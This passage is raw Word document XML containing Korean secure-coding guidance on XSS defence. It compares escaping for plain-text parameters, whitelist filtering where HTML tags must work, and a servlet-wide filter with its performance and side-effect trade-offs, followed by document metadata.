      <w:r w:rsidR="00B659BD">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>에 바로 적용할 수 없으므로 HTML이 아닌 단순 텍스트 인자에 적합하다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3768C639" w14:textId="77777777"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전달되는 경우</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49894642" w14:textId="77777777" w:rsidR="00B659BD" w:rsidRPr="00B659BD" w:rsidRDefault="00B659BD" w:rsidP="00B659BD">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">사용자 입력 값이 뷰에 노출시킬 목적이 아닌 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될 경우 치환으로 인한 원본 데이터 훼손의 우려가 있다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32592BBE" w14:textId="77777777" w:rsidR="00437072" w:rsidRDefault="00437072" w:rsidP="00431F07">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21EFE2BB" w14:textId="77777777"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HTML 태그 사용이 필요한 경우</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD9D716" w14:textId="77777777" w:rsidR="00B659BD" w:rsidRDefault="004F296A" w:rsidP="00B659BD">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTML 태그가 동작해야 하므로 White List 방식의 XSS 공격 구문 필터가 요구된다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="621D0E7A" w14:textId="77777777" w:rsidR="004F296A" w:rsidRDefault="004F296A" w:rsidP="00B659BD"/>
    <w:p w14:paraId="0FC153F6" w14:textId="77777777" w:rsidR="008827C8" w:rsidRDefault="004F296A" w:rsidP="008827C8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일괄적으로 필터를 적용하고자 하는 경우</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06BEBE97" w14:textId="77777777" w:rsidR="008827C8" w:rsidRPr="008827C8" w:rsidRDefault="008827C8" w:rsidP="008827C8">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Servlet으로 </w:t>
      </w:r>
      <w:r w:rsidR="004F296A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 공격 구문을 필터 한다</w:t>
      </w:r>
      <w:r w:rsidR="004F296A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>. 쉽게 적용할 수 있지만 입력 인자 모두에 적용되므로 의도치 않은 결과를 발생시킬 수 있으며, 필터가 불필요한 인자도 포함되므로 서비스 성능의 저하를 가져온다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA25F80" w14:textId="77777777" w:rsidR="00B659BD" w:rsidRPr="008827C8" w:rsidRDefault="00B659BD" w:rsidP="00B659BD"/>
    <w:sectPr w:rsidR="00B659BD" w:rsidRPr="008827C8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altName w:val="Malgun Gothic Semilight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F0F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651C3419"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="15F6C14E"/>
    <w:lvl w:ilvl="0" w:tplc="3F88CD4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CEE3734"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AD787522"/>
    <w:lvl w:ilvl="0" w:tplc="44888CE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">
    <w:nsid w:val="7B7804BA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="82B49E82"/>
    <w:lvl w:ilvl="0" w:tplc="0C625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010531"/>
    <w:rsid w:val="0002704B"/>
    <w:rsid w:val="00070285"/>
    <w:rsid w:val="00096F6F"/>
    <w:rsid w:val="00182BCA"/>
    <w:rsid w:val="002C1CD1"/>
    <w:rsid w:val="00373126"/>
    <w:rsid w:val="00394687"/>
    <w:rsid w:val="003C4836"/>
    <w:rsid w:val="003F170A"/>
    <w:rsid w:val="00431F07"/>
    <w:rsid w:val="00437072"/>
    <w:rsid w:val="00496245"/>
    <w:rsid w:val="004F296A"/>
    <w:rsid w:val="005904AE"/>
    <w:rsid w:val="005C1003"/>
    <w:rsid w:val="00684E4C"/>
    <w:rsid w:val="0069772D"/>
    <w:rsid w:val="008827C8"/>
    <w:rsid w:val="008B2D11"/>
    <w:rsid w:val="008C3A40"/>
    <w:rsid w:val="008D2128"/>
    <w:rsid w:val="009A2F22"/>
    <w:rsid w:val="009C2CA8"/>
    <w:rsid w:val="009E0257"/>
    <w:rsid w:val="00A62BE3"/>
    <w:rsid w:val="00B625F3"/>
    <w:rsid w:val="00B659BD"/>
    <w:rsid w:val="00B813AF"/>
    <w:rsid w:val="00E81139"/>
    <w:rsid w:val="00E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5BCD-74F5-4615-8157-3CB2514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etas965</cp:lastModifiedBy>
  <cp:revision>15</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-06-13T05:51:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-06-18T23:25:00Z</dcterms:modified>
</cp:coreProperties>
</file>